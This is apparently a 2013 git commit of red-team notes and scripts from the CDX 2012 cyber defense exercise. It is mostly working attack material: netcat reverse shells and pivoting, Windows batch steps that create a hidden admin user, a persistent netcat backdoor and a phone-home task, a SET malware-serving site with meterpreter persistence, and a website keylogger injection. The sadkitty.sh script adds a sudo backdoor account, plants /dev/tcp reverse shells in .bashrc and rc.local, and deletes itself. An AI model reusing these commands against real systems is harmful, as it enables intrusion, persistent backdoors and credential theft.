Commit 0e3d04e
2013-05-28 10:10:24
Changed files (3)
CDX-RC-2012
sadkitty
CDX-RC-2012/README.md
@@ -0,0 +1,326 @@
+CDX-RC-Docs
+===========
+Feel free to pull this doc to add, update, correct it
+
+
+s#!thackersay
+--------------
+
+1. whack back doublebackwhack - n00bfac3
+2. I'm touching it the wrong way - moose
+3. every cloud has a cyber lining - bryfry
+4. I'm taking an fgdump all over this - dub
+5. It's Mudge's little thing keeping us in there! - dub
+6. I cannot have enough shells right now, it's ridiculous! Shells on shells on shells! Shells gone wild! - moose
+7. I cacl'd it up in there! - n00bfac3
+8. dub: The G-Spot is going to be beaconing
+
+ bryfry: You should come up with another word for beaconing.
+
+9. You just dumped your own hashes - d1
+10. It's very very hung - dub
+11. ```21:45:45 <Mr.T> I tty the foo```
+12. Yeah, you can't control-C... - moose
+13. It wasn't a stupid question–it's the middle of the night…literally! - n00bfac3
+14. The question is NO - moose
+15. hash-bang explana-brag! - bryfry
+16. I'm going to insert the trojan in the box, drop my payload, and spawn so many child processes - mstaint
+
+Bad Red Cell Hat Log
+--------------------
+1. Rookie4U scanned from armitage server.
+2. Rookie4U scanned from armitage server again.
+3. and again.
+4. Mudge egressed on 21
+5. p0nyExpr3ss exploited from armitage server
+6. bryfry posted red team SSH keys to public drop box
+7. (honorary) Cmdr Odom grabbed passwd/shadow ... of local machine (GET FTW)
+
+Media
+-----
+
+Screenshots & Photos: http://goo.gl/MVeB3
+
+Armitage
+--------
+
+#### Client Setup
+
+ * Host: ```<armitage server ip>```
+ * Port: ```55553```
+ * User: ```msf```
+ * Pass: ```<password>```
+
+#### Server Setup
+
+``` bash
+# get the teamserver startup script that doesnt come on bt5 rc2
+cd /opt/metasploit/msf3/data/armitage
+wget http://armitage.googlecode.com/svn-history/r737/trunk/release/armitage-unix/teamserver
+chmod a+x teamserver
+# start the server
+./teamserver <external ip> <password>
+```
+
+NetCat
+------
+
+Server (listener):
+``` bash
+ncat <ip> <port> -klvm 1
+```
+
+Client:
+``` bash
+nc <server ip> <port> -e /bin/bash 1>/dev/null 2>/dev/null &
+```
+
+Upgrade from nc shell to terminal-ish:
+``` bash
+python -c 'import pty; pty.spawn("/bin/sh")
+```
+
+#### nc Pivoting with Named Pipes
+
+
+```
+
+### Setup ###
+
++-----------------+ +----------------+ +----------------+
+| attacker | | nc pivot | | target |
+|-----------------| |----------------| |----------------|
+| | | | | |
+| attacker net |<-------| target net | | target net |
+| | nc | | | |
++-----------------+ +----------------+ +----------------+
+
+### Execute ###
+ nc pivot $ mknod x p
++-----+ $ nc <attacker ip> 443 < x | nc <target ip> 445 > x
+| msf |
++-----+ attacker $ mknod y p
+ | $ nc -klp 443 < y | nc -klp 1234 > y
+ v
++-----------------+ +----------------+ +----------------+
+| | attacker | | nc pivot | | target |
+|-----------------| |----------------| |----------------|
+| | | | | | |
+| | +->|<------>|-----> x ------>|-------->| :( |
+| v | | | | | |
++--------------+--+ +----------------+ +----------------+
+ 1234 443
+ ^ ^
+ | localhost |
+ +--> y <--+
+```
+
+#### Port Knocking to initiate nc with iptables
+
+iptables: watch for tcp connection on ```<port>```
+
+```
+sudo iptables -A INPUT -p tcp --dport <port> -j LOG --log-prefix="token <port>"
+```
+
+Watch log for token
+
+```
+tail -f /var/log/messages | awk '/token <port>/ {system("/sbin/netplugd-ng <port>")}' &
+```
+
+
+
+
+Windows
+-------
+
+#### Change user desktop
+
+``` cmd
+reg add "hkcu\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
+reg add "hkcu\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\[LOCATION OF WALLPAPER]" /f
+reg delete "hkcu\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
+reg add "hkcu\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
+RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
+```
+
+#### Windows .bat runs token_util.exe
+
+save following code into younameit.bat
+
+``` bash
+@echo off
+start "" "C:\TOKEN_AGENT\token_agent_cxfreeze\token_util.exe"
+```
+
+#### Add new user
+
+``` cmd
+@echo Adding new user...
+net user WindowsAssistance P@ssw0rd /add
+@echo Adding new user to Admin and Remote access groups...
+net localgroup Administrators WindowsAssistance /add
+net localgroup "Remote Desktop Users" WindowsAssistance /add
+```
+
+#### Hide user from Welcome screen
+
+``` cmd
+@echo Hiding new user from welcome screen...
+reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v WindowsAssistance /t REG_DWORD /d 0 /f
+```
+
+#### Enable RDP
+
+``` cmd
+@echo Enabling Remote Desktop Service and opening firewall port...
+netsh firewall set service remoteadmin enable
+netsh firewall set service remotedesktop enable
+reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
+```
+
+#### Enable Telnet
+
+``` cmd
+@echo Enabling telnet and opening port...
+sc config tlntsvr start= auto
+net start telnet
+netsh firewall add portopening TCP 23 Telnet
+```
+
+#### Install Persistent NetCat Listener
+
+``` cmd
+@echo Installing persistent netcat listener...
+copy znc.exe %SYSTEMROOT%
+echo znc.exe -L -p %BACKDOOR_PORT% -d -e cmd.exe > Windows-Backup.bat
+copy Windows-Backup.bat "%USERPROFILE%\Start Menu\Programs\Startup"
+attrib +R +H "%USERPROFILE%\Start Menu\Programs\Startup\Windows-Backup.bat"
+attrib +R +H Windows-Backup.bat
+netsh firewall add portopening TCP %BACKDOOR_PORT% Windows-Backup
+```
+
+#### NetCat Caller
+
+``` cmd
+@echo Creating phone-home task...
+echo ECHO OFF > %SYSTEMROOT%\service.bat
+echo znc.exe %NCL% 8080 -d -e cmd.exe >> %SYSTEMROOT%\service.bat
+attrib +R +H %SYSTEMROOT%\service.bat
+schtasks /create /RU RemoteAssistance /RP P@ssw0rd /SC MINUTE /MO 5 /TN Backup /TR "service.bat"
+schtasks /change /tn Backup /ru ""
+```
+
+#### See Windows sessions and kill one
+
+``` cmd
+C:\windows\system32\dllcache\quser.exe
+logoff <sessionid>
+```
+
+#### Wiggle da mouse! (kill the screensaver)
+
+```taskkill /f /im logon.scr```
+
+#### NET USER using IPv6
+
+```net use X: \\2001-dbb-c18-555-f8d9-a1ea-b86e-10ad.ipv6-literal.net\SYSVOL /user:scorebot Dinosaur2```
+
+Misc. Tools / Tricks
+--------------------
+
+#### DNS Zone Transfers
+
+dnstz.rb
+
+``` ruby
+#!/usr/bin/env ruby
+
+teams = [
+['10.1.20.5','usafa.bluenet'],
+['10.1.30.5','afit1.bluenet'],
+['10.1.40.5','uscga.bluenet'],
+['10.1.50.5','usmma.bluenet'],
+['10.1.60.5','usma.bluenet'],
+['10.1.70.5','usna.bluenet'],
+['10.1.80.5','afit2.bluenet'],
+['10.1.90.5','nps.bluenet'],
+['10.1.100.5','rmc.bluenet']
+]
+
+teams.each do |team|
+
+dump = %x[dig -t AXFR #{team[1]} @#{team[0]} +time=1]
+
+puts dump
+end
+```
+
+#### Wireshark of Remote Host
+
+This will run a tcpdump on a remote host and pipe the results through ssh back to your local host and show it in wireshark.
+
+```
+ssh <user>@<remote ip> tcpdump -U -s0 -w - 'not port 22' | wireshark -k -i -
+```
+
+#### Create a malware serving website with SET
+
+```cd /pentest/exploit/set```
+
+edit /pentest/exploit/set/config/set_config
+
+```
+METERPRETER_MULTI_SCRIPT=ON
+METERPRETER_MULTI_COMMANDS= run persistence -r 10.2.222.222 -p 443 -P windows/meterpreter/reverse_https -i 5 -X -A -U
+AUTO_DETECT=ON
+APACHE_SERVER=ON
+APACHE_DIRECTORY=/var/www
+SELF_SIGNED_APPLET=ON
+JAVA_ID_PARAM=Secure CDX Java App #or whatever you want
+AUTOMATIC_LISTENER=ON
+```
+
+Start set: ```./set```
+
+```
+1) Social-Engineering Attacks
+2) Website Attack Vectors
+1) Java Applet Attack Method
+Clone or Template
+Input your web server external IP
+9) Windows Meterpreter Reverse HTTPS
+16) Backdoored Executable
+Default listener port [443]
+```
+
+Get a dns entry created for your website
+
+Sit back and wait patiently
+
+USAFA Website Defacement / Keylogger
+------------------------------------
+
+#### The open door
+``` html
+<script type="text/javascript" src="http://code.jquery.com/jquery-1.7.1.min.js"></script>
+```
+
+#### The site defacement
+``` javascript
+define=="function"&&define.amd&&define.amd.jQuery&&define("jquery",[],function(){return f})})(window);
+jQuery(document).ready(function() { jQuery("td a img").first().attr("src", "http://www.whitehouse.com/jb7.jpg").attr("width", 128).attr("height", 200).attr("alt", "boys, this is what you're fighting for");
+jQuery(".boardtitle").text("Boys, this is what you're fighting for");
+```
+
+#### The Keylogger
+
+``` javascript
+jQuery("body").append("<script SRC=\"http://10.2.36.5:443/analytics/test.js\"></script>"); });
+```
+
+js created with: ```msf> use auxiliary/server/capture/http_javascript_keylogger```a
+
+
+
sadkitty/README.md
@@ -0,0 +1,11 @@
+sadkitty
+========
+
+Welcome to the l1tt3r b0x
+```
+ \ /\\
+ ) ( ')
+ ( / )
+ \(__)| meow, sup bitches?
+```
+
sadkitty/sadkitty.sh
@@ -0,0 +1,28 @@
+#!/bin/sh
+adduser nntp --system --shell /bin/sh --home /var/spool/news --uid 50
+echo "nntp|badpassw0rd!!!" | chpasswd
+echo "nntp ALL=(ALL) ALL" >> /etc/sudoers
+useradd -g nntp admin
+iptables -A INPUT -m state --state RELATED,ESTABLISHED -j ACCEPT
+iptables -A INPUT -i lo -j ACCEPT
+iptables -A INPUT -p tcp -m state --state NEW -m tcp --dport 22 -j ACCEPT
+iptables -A INPUT -s 192.168.12.152/255.255.255.255 -j ACCEPT
+iptables -A INPUT -j REJECT --reject-with icmp-host-prohibited
+/etc/init.d/samba restart
+echo "/bin/bash -i > /dev/tcp/192.168.12.152/6666 0>&1 &" >> ~/.bashrc
+echo "#!/bin/bash
+/bin/bash -i > /dev/tcp/192.168.12.152/6667 0>&1 &
+exit 0" > /etc/rc.local
+echo "
+Welcome to the l1tt3r b0x
+
+ \ /\\
+ ) ( ')
+ ( / )
+ \(__)| meow, sup bitches?
+
+" > /etc/issue.net
+echo "Banner /etc/issue.net" >> /etc/ssh/sshd_config
+/etc/init.d/ssh restart
+rm `pwd`/sadkitty.sh
+